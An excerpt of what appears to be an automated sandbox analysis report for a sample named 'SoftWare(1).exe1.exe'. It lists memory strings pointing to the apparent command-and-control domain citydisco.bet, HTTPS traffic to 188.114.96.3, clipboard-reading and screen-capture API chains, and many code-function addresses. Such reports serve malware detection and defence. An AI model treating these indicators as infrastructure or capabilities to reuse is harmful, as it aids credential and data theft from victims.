Source: SoftWare(1).exe1.exe, 00000001.00000003.1498548634.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624044709.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580093009.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1498327150.0000000000C37000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1498217709.0000000000C36000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1522885823.0000000000C37000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1523213989.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1523610470.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1550248094.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1522902781.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580607406.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1499635397.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1523274461.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625535942.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1498172157.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1524423633.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602215909.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS
Source: SoftWare(1).exe1.exe, 00000001.00000003.1549986383.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1550356936.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS0
Source: SoftWare(1).exe1.exe, 00000001.00000003.1549986383.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS4
Source: SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625502494.0000000000C14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS=.
Source: SoftWare(1).exe1.exe, 00000001.00000003.1580204979.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISD
Source: SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625502494.0000000000C14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISG
Source: SoftWare(1).exe1.exe, 00000001.00000003.1498172157.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIST
Source: SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISl
Source: SoftWare(1).exe1.exe, 00000001.00000003.1623669679.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1624372039.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000002.1625502494.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/kI
Source: SoftWare(1).exe1.exe, 00000001.00000003.1580306859.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1601482730.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602098251.0000000000C0F000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1602360035.0000000000C13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/m
Source: SoftWare(1).exe1.exe, 00000001.00000002.1625670673.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJIS
Source: SoftWare(1).exe1.exe, 00000001.00000002.1625670673.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1580041579.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJISJAD2
Source: SoftWare(1).exe1.exe, 00000001.00000003.1580041579.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1524404877.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1522858103.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, SoftWare(1).exe1.exe, 00000001.00000003.1523161611.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet:443/gdJISl
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: SoftWare(1).exe1.exe, 00000001.00000003.1467321786.000000000330A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: SoftWare(1).exe1.exe, 00000001.00000003.1524502771.00000000034D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 1_2_0043F410 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

1_2_0043F410

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 1_2_0043F410 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

1_2_0043F410

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe

Code function: 1_2_0043FC48 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

1_2_0043FC48

Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003031F0	0_2_003031F0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00303640	0_2_00303640
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031A820	0_2_0031A820
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00319020	0_2_00319020
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032A020	0_2_0032A020
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00333813	0_2_00333813
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031C010	0_2_0031C010
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00301000	0_2_00301000
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00306070	0_2_00306070
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032F060	0_2_0032F060
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00314040	0_2_00314040
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003058A0	0_2_003058A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031E0A0	0_2_0031E0A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00308090	0_2_00308090
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00310890	0_2_00310890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00323890	0_2_00323890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00331890	0_2_00331890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00304080	0_2_00304080
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032D080	0_2_0032D080
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003300D0	0_2_003300D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00332920	0_2_00332920
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00320110	0_2_00320110
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00329100	0_2_00329100
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0034C908	0_2_0034C908
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030E170	0_2_0030E170
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00333160	0_2_00333160
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00304940	0_2_00304940
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031C940	0_2_0031C940
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032F9B0	0_2_0032F9B0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00316180	0_2_00316180
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031B1E0	0_2_0031B1E0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00305220	0_2_00305220
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00309220	0_2_00309220
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00325220	0_2_00325220
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00320A10	0_2_00320A10
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00326A00	0_2_00326A00
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00328200	0_2_00328200
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00328A50	0_2_00328A50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00336A54	0_2_00336A54
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00329AB0	0_2_00329AB0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030EAA0	0_2_0030EAA0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00314290	0_2_00314290
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00302280	0_2_00302280
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032F2E0	0_2_0032F2E0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030F2D0	0_2_0030F2D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003152C0	0_2_003152C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030C310	0_2_0030C310
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030B300	0_2_0030B300
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031FB70	0_2_0031FB70
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00321370	0_2_00321370
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00320350	0_2_00320350
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00308340	0_2_00308340
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032EB40	0_2_0032EB40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031ABA0	0_2_0031ABA0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00306390	0_2_00306390
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00313390	0_2_00313390
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003173F0	0_2_003173F0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031F3D0	0_2_0031F3D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00305C20	0_2_00305C20
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00341420	0_2_00341420
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0033B41A	0_2_0033B41A
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00333477	0_2_00333477
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00325C60	0_2_00325C60
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00328450	0_2_00328450
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00302C40	0_2_00302C40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031EC40	0_2_0031EC40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00328C40	0_2_00328C40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003054A0	0_2_003054A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00310490	0_2_00310490
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00333C90	0_2_00333C90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00306C80	0_2_00306C80
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00316480	0_2_00316480
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00325480	0_2_00325480
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00332480	0_2_00332480
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031CCE0	0_2_0031CCE0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030E4C0	0_2_0030E4C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00313CC0	0_2_00313CC0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00307D30	0_2_00307D30
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030F530	0_2_0030F530
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030AD30	0_2_0030AD30
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00339536	0_2_00339536
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00319500	0_2_00319500
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031D560	0_2_0031D560
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031DD50	0_2_0031DD50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032FD50	0_2_0032FD50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00318540	0_2_00318540
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003155B0	0_2_003155B0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032EDB0	0_2_0032EDB0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00309580	0_2_00309580
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032DD80	0_2_0032DD80
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032F5D0	0_2_0032F5D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003335C0	0_2_003335C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031B630	0_2_0031B630
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00329630	0_2_00329630
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00317620	0_2_00317620
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00310E20	0_2_00310E20
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00330620	0_2_00330620
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00304660	0_2_00304660
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00317E50	0_2_00317E50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00308640	0_2_00308640
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00316E40	0_2_00316E40
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031C6A0	0_2_0031C6A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00312E90	0_2_00312E90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00328690	0_2_00328690
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00332E90	0_2_00332E90
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0032B680	0_2_0032B680
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003126F0	0_2_003126F0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00331EF0	0_2_00331EF0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030E730	0_2_0030E730
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00319720	0_2_00319720
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00329F00	0_2_00329F00
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0031FF70	0_2_0031FF70
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00301790	0_2_00301790
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00316790	0_2_00316790
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0030B780	0_2_0030B780
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00320F80	0_2_00320F80
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_0034E782	0_2_0034E782
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_00309FF0	0_2_00309FF0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 0_2_003067D0	0_2_003067D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031A820	1_2_0031A820
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00319020	1_2_00319020
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032A020	1_2_0032A020
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00333813	1_2_00333813
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031C010	1_2_0031C010
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00301000	1_2_00301000
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032F060	1_2_0032F060
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00314040	1_2_00314040
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003058A0	1_2_003058A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031E0A0	1_2_0031E0A0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00308090	1_2_00308090
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00310890	1_2_00310890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00323890	1_2_00323890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00331890	1_2_00331890
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00304080	1_2_00304080
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032D080	1_2_0032D080
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003300D0	1_2_003300D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00332920	1_2_00332920
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00320110	1_2_00320110
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00329100	1_2_00329100
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0034C908	1_2_0034C908
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030E170	1_2_0030E170
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00333160	1_2_00333160
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00304940	1_2_00304940
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031C940	1_2_0031C940
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032F9B0	1_2_0032F9B0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00316180	1_2_00316180
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003031F0	1_2_003031F0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031B1E0	1_2_0031B1E0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00305220	1_2_00305220
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00309220	1_2_00309220
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00325220	1_2_00325220
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00320A10	1_2_00320A10
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00326A00	1_2_00326A00
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00328200	1_2_00328200
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00328A50	1_2_00328A50
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00336A54	1_2_00336A54
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00329AB0	1_2_00329AB0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030EAA0	1_2_0030EAA0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00314290	1_2_00314290
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_00302280	1_2_00302280
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0032F2E0	1_2_0032F2E0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030F2D0	1_2_0030F2D0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_003152C0	1_2_003152C0
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030C310	1_2_0030C310
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0030B300	1_2_0030B300
Source: C:\Users\user\Desktop\SoftWare(1).exe1.exe	Code function: 1_2_0031FB70	1_2_0031FB70
